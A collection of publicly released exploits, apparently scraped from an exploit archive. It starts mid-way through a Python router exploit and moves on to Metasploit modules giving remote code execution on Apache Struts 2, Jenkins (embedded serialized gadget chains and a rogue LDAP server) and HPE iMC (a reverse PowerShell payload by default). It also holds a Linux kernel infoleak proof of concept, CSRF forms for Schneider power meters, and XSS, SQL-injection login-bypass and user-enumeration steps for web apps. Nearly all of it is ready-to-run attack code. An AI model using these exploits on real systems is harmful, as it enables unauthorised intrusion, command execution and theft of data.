{"config":"p910nd", "type":"p910nd", "values":
{"enabled":"1", "interface":"lan", "port":"0",
"device":"/etc/init.d/p910nd"}})
if (not pwn910nd):
print("Enabling p910nd failed!")
sys.exit(1)
print("Committing changes...")
p910ndc = ubusCall(host, key, "uci", "commit",
{"config":"p910nd"})
if (not p910ndc):
print("Committing changes failed!")
sys.exit(1)
print("Waiting for p910nd to start...")
time.sleep(5)
print("Sending key...")
sendData(host, 9100, payload)
print("Triggerring exploit...")
print("Cleaning up...")
dis910nd = ubusCall(host, key, "uci", "set",
{"config":"p910nd", "type":"p910nd", "values":
{"enabled":"0", "device":"/dev/usb/lp0"}})
if (not dis910nd):
print("Exploit and clean up failed!")
sys.exit(1)
p910ndc = ubusCall(host, key, "uci", "commit",
{"config":"p910nd"})
if (not p910ndc):
print("Exploit and clean up failed!")
sys.exit(1)
print("Exploitation complete")
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Apache Struts 2 Struts 1 Plugin Showcase OGNL Code Execution',
'Description' => %q{ This module exploits a remote code execution vulnerability in the Struts Showcase app in the Struts 1 plugin example in Struts 2.3.x series. Remote Code Execution can be performed via a malicious field value. },
'License' => MSF_LICENSE,
'Author' => [
'icez <ic3z at qq dot com>',
'Nixawk',
'xfer0'
],
'References' => [
[ 'CVE', '2017-9791' ],
[ 'BID', '99484' ],
[ 'EDB', '42324' ],
[ 'URL', 'https://cwiki.apache.org/confluence/display/WW/S2-048' ]
],
'Privileged' => true,
'Targets' => [
[
'Universal', {
'Platform' => %w{ linux unix win },
'Arch' => [ ARCH_CMD ]
}
]
],
'DisclosureDate' => 'Jul 07 2017',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(8080),
OptString.new('TARGETURI', [ true, 'The path to a struts application action', '/struts2-showcase/integration/saveGangster.action' ]),
OptString.new('POSTPARAM', [ true, 'The HTTP POST parameter', 'name' ])
]
)
end
def send_struts_request(ognl)
var_a = rand_text_alpha_lower(4)
var_b = rand_text_alpha_lower(4)
uri = normalize_uri(datastore['TARGETURI'])
data = {
datastore['POSTPARAM'] => ognl,
'age' => var_a,
'__checkbox_bustedBefore' => 'true',
'description' => var_b
}
resp = send_request_cgi({
'uri' => uri,
'method' => 'POST',
'vars_post' => data
})
if resp && resp.code == 404
fail_with(Failure::BadConfig, 'Server returned HTTP 404, please double check TARGETURI')
end
resp
end
def check
var_a = rand_text_alpha_lower(4)
var_b = rand_text_alpha_lower(4)
ognl = "%{'#{var_a}' + '#{var_b}'}"
begin
resp = send_struts_request(ognl)
rescue Msf::Exploit::Failed
return Exploit::CheckCode::Unknown
end
if resp && resp.code == 200 && resp.body.include?("#{var_a}#{var_b}")
Exploit::CheckCode::Vulnerable
else
Exploit::CheckCode::Safe
end
end
def exploit
resp = exec_cmd(payload.encoded)
unless resp and resp.code == 200
fail_with(Failure::Unknown, "Exploit failed.")
end
print_good("Command executed")
print_line(resp.body)
end
def exec_cmd(cmd)
ognl = "%{(#_='multipart/form-data')."
ognl << "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
ognl << "(#_memberAccess?(#_memberAccess=#dm):"
ognl << "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
ognl << "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
ognl << "(#ognlUtil.getExcludedPackageNames().clear())."
ognl << "(#ognlUtil.getExcludedClasses().clear())."
ognl << "(#context.setMemberAccess(#dm))))."
ognl << "(#cmd='#{cmd}')."
ognl << "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
ognl << "(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start())."
ognl << "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
ognl << "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
send_struts_request(ognl)
end
end
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
STAGE1 = "aced00057372002b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e466c6174334d6170a300f47ee17184980300007870770400000002737200316f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e7365742e4c6973744f726465726564536574fcd39ef6fa1ced530200014c00087365744f726465727400104c6a6176612f7574696c2f4c6973743b787200436f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e7365742e416273747261637453657269616c697a61626c655365744465636f7261746f72110ff46b96170e1b0300007870737200156e65742e73662e6a736f6e2e4a534f4e41727261795d01546f5c2872d20200025a000e657870616e64456c656d656e74734c0008656c656d656e747371007e0003787200186e65742e73662e6a736f6e2e41627374726163744a534f4ee88a13f4f69b3f82020000787000737200136a6176612e7574696c2e41727261794c6973747881d21d99c7619d03000149000473697a65787000000001770400000001740008041ac080131d170678787371007e00090000000077040000000078737200116a6176612e6c616e672e426f6f6c65616ecd207280d59cfaee0200015a000576616c75657870017372002a6a6176612e7574696c2e636f6e63757272656e742e436f6e63757272656e74536b69704c697374536574dd985079bdcff15b0200014c00016d74002d4c6a6176612f7574696c2f636f6e63757272656e742f436f6e63757272656e744e6176696761626c654d61703b78707372002a6a6176612e7574696c2e636f6e63757272656e742e436f6e63757272656e74536b69704c6973744d6170884675ae061146a70300014c000a636f6d70617261746f727400164c6a6176612f7574696c2f436f6d70617261746f723b7870707372001f636f6d2e73756e2e6a6e64692e6c6461702e4c646170417474726962757465c47b6b02a60583c00300034c000a62617365437478456e767400154c6a6176612f7574696c2f486173687461626c653b4c000a6261736543747855524c7400124c6a6176612f6c616e672f537472696e673b4c000372646e7400134c6a617661782f6e616d696e672f4e616d653b787200256a617661782e6e616d696e672e6469726563746f72792e42617369634174747269627574655d95d32a668565be0300025a00076f7264657265644c000661747472494471007e001778700074000077040000000078707400156c6461703a2f2f6c6f63616c686f73743a313233347372001a6a617661782e6e616d696e672e436f6d706f736974654e616d6517251a4b93d67afe0300007870770400000000787871007e000e707871007e000e78"
# java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections6 'touch /tmp/wtf'
STAGE2 = "aced0005737200116a6176612e7574696c2e48617368536574ba44859596b8b7340300007870770c000000023f40000000000001737200346f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6b657976616c75652e546965644d6170456e7472798aadd29b39c11fdb0200024c00036b65797400124c6a6176612f6c616e672f4f626a6563743b4c00036d617074000f4c6a6176612f7574696c2f4d61703b7870740003666f6f7372002a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e7471007e00037870767200116a6176612e6c616e672e52756e74696d65000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a990200007870000000007400096765744d6574686f647571007e001b00000002767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb34202000078707671007e001b7371007e00137571007e001800000002707571007e001800000000740006696e766f6b657571007e001b00000002767200106a6176612e6c616e672e4f626a656374000000000000000000000078707671007e00187371007e0013757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b4702000078700000000174000e746f756368202f746d702f777466740004657865637571007e001b0000000171007e00207371007e000f737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b020000787000000001737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000077080000001000000000787878"
SEARCH_REQUEST = 3
SEARCH_RES_ENTRY = 4
SEARCH_RES_DONE = 5
ABANDON_REQUEST = 16
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Jenkins CLI HTTP Java Deserialization Vulnerability',
'Description' => %q{
This module exploits a vulnerability in Jenkins. An unsafe deserialization bug exists on
the Jenkins, which allows remote arbitrary code execution via HTTP. Authentication is not
required to exploit this vulnerability.
},
'Author' =>
[
'Matthias Kaiser', # Original Vulnerability discovery
'Alisa Esage', # Private Exploit
'Ivan', # Metasploit Module Author
'YSOSerial' #Stage 2 payload
],
'License' => MSF_LICENSE,
'Platform' => ['linux', 'unix'],
'Arch' => ARCH_CMD,
'Targets' => [ [ 'Jenkins 2.31', {} ] ],
'References' =>
[
['CVE', '2016-9299'],
['URL', 'https://github.com/jenkinsci-cert/SECURITY-218'],
['URL', 'https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2016-11-16'],
['URL', 'http://www.slideshare.net/codewhitesec/java-deserialization-vulnerabilities-the-forgotten-bug-class-deepsec-edition'],
['URL', 'https://github.com/frohoff/ysoserial']
],
'Payload' =>
{
'Compat' =>
{
'PayloadType' => 'cmd'
}
},
'DefaultTarget' => 0,
'DisclosureDate' => 'Nov 16 2016'
))
register_options([
OptString.new('TARGETURI', [true, 'The base path to Jenkins', '/']),
Opt::RPORT('8080'),
OptAddress.new('SRVHOST', [ true, "The local host to listen on for the ldap server. This must be an address on the local machine or 0.0.0.0", '127.0.0.1' ]),
OptPort.new('SRVPORT', [ true, "The local port to listen on for the ldap server.", 1389 ]),
OptAddress.new('LDAPHOST', [ true, "The ldap host the exploit will try to connect to ", '127.0.0.1' ])
])
end
def target_uri
begin
URI(datastore['TARGETURI'])
rescue ::URI::InvalidURIError
print_error "Invalid URI: #{datastore['TARGETURI'].inspect}"
raise Msf::OptionValidateError.new(['TARGETURI'])
end
end
def normalize_uri(*strs)
new_str = strs * "/"
new_str = new_str.gsub!("//", "/") while new_str.index("//")
# Makes sure there's a starting slash
unless new_str[0,1] == '/'
new_str = '/' + new_str
end
new_str
end
def aseq(x, tag)
s = seq(x)
s.tag_class = :APPLICATION
s.tag = tag
s
end
def seq(x)
OpenSSL::ASN1::Sequence.new(x)
end
def int(x)
OpenSSL::ASN1::Integer.new(x)
end
def string(x)
OpenSSL::ASN1::OctetString.new(x)
end
def set(x)
OpenSSL::ASN1::Set.new(x)
end
def enum(x)
OpenSSL::ASN1::Enumerated.new(x)
end
def java_string(s)
length = s.length
packed_length = [length].pack("S>")
"#{packed_length}#{s}"
end
def search_res_done(message_id)
s = seq([
int(message_id),
aseq([enum(0), string(""), string("")], SEARCH_RES_DONE)
])
s.to_der
end
def make_stage2(command)
[STAGE2].pack("H*").gsub("\x00\x0Etouch /tmp/wtf", java_string(command))
end
def make_stage2_reply(command, message_id)
java_class_name_attributes = seq([string("javaClassName"), set([string("WTF")])])
java_serialized_data_attributes = seq([string("javaSerializedData"), set([string(make_stage2(command))])])
attributes = seq([java_class_name_attributes, java_serialized_data_attributes])
s = seq([
int(message_id),
aseq([string("cn=wtf, dc=example, dc=com"), attributes], SEARCH_RES_ENTRY)])
s.to_der
end
def make_stage1(ldap_url)
[STAGE1].pack("H*").gsub("\x00\x15ldap://localhost:1234", java_string(ldap_url))
end
def read_ldap_packet(socket)
buffer = ""
bytes = socket.read(2)
if bytes[0] != "0"
raise "NOT_LDAP: #{bytes.inspect} #{bytes[0]}"
end
buffer << bytes
length = bytes[1].ord
if (length & (1<<7)) != 0
length_bytes_length = length ^ (1<<7)
length_bytes = socket.read(length_bytes_length)
buffer << length_bytes
length = length_bytes.bytes.reduce(0) {|c, e| (c << 8) + e}
end
buffer << socket.read(length)
buffer
end
def write_chunk(socket, chunk)
socket.write(chunk.bytesize.to_s(16) + "\r\n")
socket.write(chunk)
socket.write("\r\n")
end
def exploit
uuid = SecureRandom.uuid
ldap_port = datastore["SRVPORT"]
ldap_host = datastore["SRVHOST"]
ldap_external_host = datastore["LDAPHOST"]
command = payload.encoded
host = datastore["RHOST"]
ldap = TCPServer.new(ldap_host, ldap_port)
cli_path = normalize_uri(target_uri.path, "cli")
begin
download = connect()
begin
download.write("POST #{cli_path} HTTP/1.1\r\n" +
"Host: #{host}\r\n" +
"User-Agent: curl/7.36.0\r\n" +
"Accept: */*\r\n" +
"Session: #{uuid}\r\n" +
"Side: download\r\n" +
"Content-Length: 0\r\n" +
"Content-Type: application/x-www-form-urlencoded\r\n\r\n")
download.read(20)
upload = connect()
begin
upload.write("POST #{cli_path} HTTP/1.1\r\n" +
"Host: #{host}\r\n" +
"User-Agent: curl/7.36.0\r\n" +
"Accept: */*\r\n" +
"Session: #{uuid}\r\n" +
"Side: upload\r\n" +
"Content-type: application/octet-stream\r\n" +
"Transfer-Encoding: chunked\r\n\r\n")
write_chunk(upload, "<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAP4=")
write_chunk(upload, "\00\00\00\00")
upload.flush
stage1 = make_stage1("ldap://#{ldap_external_host}:#{ldap_port}")
chunk_header = [stage1.bytesize].pack("S>")
write_chunk(upload, chunk_header + stage1)
upload.flush
client = ldap.accept
begin
# this hardcodes an ldap conversation
# read bindRequest
read_ldap_packet(client)
# write bindResponse
client.write(["300c02010161070a010004000400"].pack("H*"))
# read searchRequest
read_ldap_packet(client)
# write searchResEntry
client.write(["3034020102642f04066f753d777466302530230411737562736368656d61537562656e747279310e040c636e3d737562736368656d61"].pack("H*"))
# write searchResDone
client.write(search_res_done(2))
# read abandonReqeust or searchRequest
bytes = read_ldap_packet(client)
packet = OpenSSL::ASN1.decode(bytes)
# abandonRequest packet is sometimes sent
# so we distinguish between abandonRequest/searchRequest
tag = packet.value[1].tag
if tag == ABANDON_REQUEST
bytes = read_ldap_packet(client)
packet = OpenSSL::ASN1.decode(bytes)
tag = packet.value[1].tag
end
if tag == SEARCH_REQUEST
message_id = packet.value[0].value.to_int
# write searchResEntry
client.write(make_stage2_reply(command, message_id))
# write searchResDone
client.write(search_res_done(message_id))
else
raise "Unexpected packet: #{tag}"
end
client.flush
ensure
client.close
end
ensure
upload.close
end
ensure
download.close
end
ensure
ldap.close
end
end
def check
result = Exploit::CheckCode::Safe
begin
if vulnerable?
result = Exploit::CheckCode::Vulnerable
end
rescue Msf::Exploit::Failed => e
vprint_error(e.message)
return Exploit::CheckCode::Unknown
end
result
end
def vulnerable?
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path)
})
unless res
fail_with(Failure::Unknown, 'The connection timed out.')
end
http_headers = res.headers
http_headers['X-Jenkins'] && http_headers['X-Jenkins'] <= "2.31"
end
# Connects to the server, creates a request, sends the request,
# reads the response
#
# Passes +opts+ through directly to Rex::Proto::Http::Client#request_cgi.
#
def send_request_cgi(opts={}, timeout = 20)
begin
c = Rex::Proto::Http::Client.new(datastore['RHOST'], datastore['RPORT'])
c.connect
r = c.request_cgi(opts)
c.send_recv(r, timeout)
rescue ::Errno::EPIPE, ::Timeout::Error
nil
end
end
end
/*
Commit 3a4d44b61625 ("ntp: Move adjtimex related compat syscalls to native
counterparts") removed the memset() in compat_get_timex(). Since then, the
compat adjtimex syscall can invoke do_adjtimex() with an uninitialized
->tai. If do_adjtimex() doesn't write to ->tai (e.g. because the arguments
are invalid), compat_put_timex() then copies the uninitialized ->tai field
to userspace.
Demo:
$ cat leak_32.c
*/
#include <sys/timex.h>
#include <assert.h>
#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <stdint.h>
#include <err.h>
/* from include/linux/timex.h */
#define ADJ_ADJTIME 0x8000
int main(void) {
struct timex tx;
memset(&tx, 0, sizeof(tx));
tx.modes = ADJ_ADJTIME; /* invalid, causes early bailout */
int res = adjtimex(&tx);
assert(res == -1 && errno == EINVAL);
printf("0x%08x\n", (unsigned int)tx.tai);
return 0;
}
/*
$ gcc -o leak_32 leak_32.c -Wall -m32
$ for i in {0..10}; do sleep 1; ./leak_32; done
0x01a300b0
0x0be8f6f0
0x0610d5f0
0x01fa0170
0x0bf05670
0x0bf05670
0x0610d5f0
0x0610cd70
0x0610d5f0
0x0610d5f0
Fixed in master: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=0a0b98734479aa5b3c671d5190e86273372cab95
Fix it by adding the memset() back.
Fixes: 3a4d44b61625 ("ntp: Move adjtimex related compat syscalls to native counterparts")
Signed-off-by: Jann Horn <jannh@google.com>
---
kernel/compat.c | 1 +
1 file changed, 1 insertion(+)
diff --git a/kernel/compat.c b/kernel/compat.c
index 6d21894806b4..92d8c98c0f57 100644
--- a/kernel/compat.c
+++ b/kernel/compat.c
@@ -34,6 +34,7 @@ int compat_get_timex(struct timex *txc, const struct compat_timex __user *utp)
{
struct compat_timex tx32;
+ memset(txc, 0, sizeof(struct timex));
if (copy_from_user(&tx32, utp, sizeof(struct compat_timex)))
return -EFAULT;
--
2.17.0.441.gb46fe60e1d-goog
*/
# Exploit Title: Powerlogic Schneider Electric IONXXXX Series - Cross-Site Request Forgery
# Date: 2018-05-17
# Exploit Author: t4rkd3vilz
# Vendor Homepage: http://www.schneider-electric.com/
# Version: ION73XX series, ION75XX series, ION76XX series, ION8650 series, ION8800 series, PM5XXX series.
# Tested on: All Version
# CVE : CVE-2016-5809
# PoC
<form name="frmConfig" action="http://TargetIp/SetupReceipt.html
<http://targetip/SetupReceipt.html>" method="post">
select name="PMLSel_0x7800">
<option selected="selected">9S - 4 Wire Wye/Delta</option>
<option>35S - 3 Wire</option>
<option>36S - 4 Wire Wye</option>
<option>DEMO</option>
</select>
<select name="PMLSel_0x7a4a">
<option selected="selected">Normal</option>
<option>Inverted</option>
</select>
<input type="text" name="PMLIFl_0x7000" size="15" value="480.00"/>
<select name="PMLSel_0x7a4b">
<option selected="selected">Normal</option>
<option>Inverted</option>
</select>
<input type="text" name="PMLIFl_0x7001" size="15" value="480.00"/>
<select name="PMLSel_0x7a4c">
<option selected="selected">Normal</option>
<option>Inverted</option>
</select>
<input type="text" name="PMLIFl_0x7002" size="15" value="200.00"/>
<input type="text" name="PMLIFl_0x7003" size="15" value="5.00"/>
<select name="PMLSel_0x7801">
<option selected="selected">Normal</option>
<option>Inverted</option>
</select>
<select name="PMLSel_0x7802">
<option selected="selected">Normal</option>
<option>Inverted</option>
</select>
<select name="PMLSel_0x7803">
<option selected="selected">Normal</option>
<option>Inverted</option>
</select>
<input type="text" name="PMLIFl_0x7004" size="15" value="5.00"/>
<select name="PMLSel_0x7a49">
<option selected="selected">Normal</option>
<option>Inverted</option>
</select>
<input type="text" name="PMLIFl_0x7005" size="15" value="5.00"/>
<input type="text" name="PMLIFl_0x721a" size="15" value="0.00"/>
<input type="text" name="PMLIStr_0x1345" size="15" value="EPMAPS"/>
<input type="text" name="PMLIFl_0x70b4" size="15" value="900.00"/>
<input type="text" name="PMLIStr_0x1346" size="15" value="POZO SAN"/>
<input type="text" name="PMLIFl_0x70c4" size="15" value="1.00"/>
<input type="text" name="PMLIStr_0x1347" size="15" value="ANTONIO PICHIN."/>
<input type="text" name="PMLIFl_0x70d4" size="15" value="70.00"/>
<input type="submit" class="btn" value="Save" name="Submit22" />
</form>
# Exploit Title: SuperCom Online Shopping Ecommerce Cart 1 - Persistent Cross-Site scripting / Cross site request forgery / Authentication bypass
# Date: 2018-05-17
# Exploit Author: L0RD
# Vendor Homepage: https://codecanyon.net/item/supercom-online-shopping-ecommerce-cart/17085987?s_rank=1442
# Version: 1
# Tested on: Kali linux
# Description: SuperCom - Online Shopping Ecommerce Cart 1 suffers from multiple vulnerabilities :
# POC 1 : Persistent cross site scripting :
1) After creating an account , go to your profile.
2) Navigate to "Update profile" and put this payload :
"/><script>alert(document.cookie)</script>
3) You will get an alert box in the page .
# POC 2 : CSRF : Attacker can change user's authentication directly :
<html>
<head>
<title>CSRF POC</title>
</head>
<body>
<form action="http://ecommerce.thesoftking.com/updateprofile"
method="post">
<input type="hidden" name="name" value="anything">
<input type="hidden" name="mobile" value="1000000000">
<input type="hidden" name="address" value="anything">
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
# POC 3 : Authentication bypass :
Path : /admin
Username : ' or 0=0 #
Password : anything
# Application: SAP NetWeaver Web Dynpro 6.4 to 7.5 - Information disclosure
# Versions Affected: SAP NetWeaver 6.4 - 7.5
# Vendor URL: http://SAP.com
# Bugs: Information disclosure (Enumerate users)
# Sent: 2016-12-15
# Reported: 2016-12-15
# Date of Public Advisory: 09.02.2016
# Reference: SAP Security Note 2344524
# Author: Richard Alviarez (SIA Group)
# CVE: N/A
# 1. ADVISORY INFORMATION
# Title: SAP NetWeaver Web Dynpro – information disclosure (Enumerate users)
# Advisory ID: 2344524
# Risk: Medium
# Date published: 20.12.2016
# 2. VULNERABILITY DESCRIPTION
# Anonymous attacker can use a special HTTP request to get information
# about SAP NetWeaver users.
# 3. VULNERABLE PACKAGES
# SAP NetWeaver Web Dynpro 6.4 - 7.5
# Other versions are probably affected too, but they were not checked.
# 4. TECHNICAL DESCRIPTION
# A potential attacker can use the vulnerability in order to reveal
# information about user names,
# first and last names, and associated emails, this can provide an attacker
# with enough information
# to make a more accurate and effective attack
# Steps to exploit this vulnerability
1. Open
http://SAP/webdynpro/dispatcher/sap.com/caf~eu~gp~example~timeoff~wd/ACreate
or
http://SAP/webdynpro/dispatcher/sap.com/caf~eu~gp~example~timeoff~wd/com.sap.caf.eu.gp.example.timeoff.wd.create.ACreate
page on SAP server
2. Press "Change processor" button
3. and in the "find" section, put the initial or name to be searched,
followed by a *
You will get a list of SAP users and information.
# Exploit Title: HPE iMC EL Injection Unauthenticated RCE
# Date: 6 February, 2018
# Exploit Author: TrendyTofu
# Vendor Homepage: https://www.hpe.com/us/en/home.html
# Software Link: http://h10145.www1.hpe.com/Downloads/SoftwareReleases.aspx?ProductNumber=JG747AAE&lang=en&cc=us&prodSeriesId=4176535
# Version: prior to 7.3 E0504P04
# Tested on: iMC PLAT v7.3 (E0504P02), Windows Server 2012R2 x64 (EN)
# CVE : CVE-2017-8982, CVE-2017-12500
# Reference:
https://www.thezdi.com/blog/2018/2/6/one-mans-patch-is-another-mans-treasure-a-tale-of-a-failed-hpe-patch
Metasploit module also hosted on Github. Posted below for reference:
https://raw.githubusercontent.com/thezdi/scripts/master/msf/hp_imc_el_injection_rce.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'HPE iMC EL Injection Unauthenticated RCE',
'Description' => %q{
This module exploits an expression language injection
vulnerablity, along with
an authentication bypass vulnerability in Hewlett Packard
Enterprise Intelligent
Management Center before version 7.3 E0504P04 to achieve
remote code execution.
The HP iMC server suffers from multiple vulnerabilities allows
unauthenticated
attacker to execute arbitrary Expression Language via the
beanName parameter,
allowing execution of arbitrary operating system commands as
SYSTEM. This service
listens on TCP port 8080 and 8443 by default.
This module has been tested successfully on iMC PLAT v7.3
(E0504P02) on Windows
2k12r2 x64 (EN).
},
'License' => MSF_LICENSE,
'Author' =>
[
'mr_me', # Discovery
'trendytofu' # Metasploit
],
'References' =>
[
['CVE', '2017-8982'],
['ZDI', '18-139'],
['URL',
'https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03809en_us'],
['CVE', '2017-12500'],
['ZDI', '17-663'],
['URL',
'https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03768en_us']
],
'Platform' => 'win',
'Arch' => ARCH_CMD,
'Targets' => [
[ 'Windows',
{
'Arch' => [ ARCH_CMD],
'Platform' => 'win'
}
]
],
'Privileged' => true,
'DisclosureDate' => 'Jan 25 2018',
'DefaultOptions' =>
{
'Payload' => 'cmd/windows/reverse_powershell'
},
'DefaultTarget' => 0))
register_options [Opt::RPORT(8080)]
end
def check
res = send_request_raw({'uri' => '/imc/login.jsf' })
return CheckCode::Detected if res && res.code == 200
CheckCode::Unknown
end
def get_payload(cmd)
%q|facesContext.getExternalContext().redirect(%22%22.getClass().forName(%22javax.script.ScriptEngineManager%22).newInstance().getEngineByName(%22JavaScript%22).eval(%22var%20proc=new%20java.lang.ProcessBuilder[%5C%22(java.lang.String[])%5C%22]([%5C%22cmd.exe%5C%22,%5C%22/c%5C%22,%5C%22|+cmd+%q|%5C%22]).start();%22))|
end
def execute_command(payload)
res = send_request_raw({ 'uri' =>
"/imc/primepush/%2e%2e/ict/export/ictExpertDownload.xhtml?beanName=#{payload}"
})
fail_with(Msf::Module::Failure::UnexpectedReply, "Injection
failed") if res && res.code != 302
print_good "Command injected successfully!"
end
def exploit
cmd = payload.encoded
cmd.gsub!('cmd.exe /c ','')
cmd = Rex::Text.uri_encode(cmd)
print_status "Sending payload..."
execute_command get_payload cmd
end
end
# Exploit Title: Monstra CMS 3.0.4 - Cross-Site Scripting
# Date: 2018-05-17
# Exploit Author: Berk Dusunur
# Vendor Homepage: https://monstra.org
# Software Link: https://monstra.org
# Version: before 3.0.4
# Tested on: Pardus / Win10 AppServer
# Proof Of Concept
# Monstra is a modern and lightweight Content Management System.
# Prints get request between script tags on page
Payload ?vrk2f'-alert(1)-'ax8vv=1
GET Request
GET /test/monstra-3.0.4/?vrk2f'-alert(1)-'ax8vv=1 HTTP/1.1
Host: 192.168.1.106
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:60.0) Gecko/20100101
Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Response
<script type="text/javascript">
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new
Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','//www.google-analytics.com/analytics.js
','_mga');
_mga('create', '', 'auto');
_mga('send', 'pageview', {
'page': 'http://192.168.1.106/test/monstra-3.0.4/?vrk2f%27-alert(1',
'title': ''
});
</script></body>
http://localhost/test/monstra-3.0.4/?vrk2f'-alert(1)-'ax8vv=1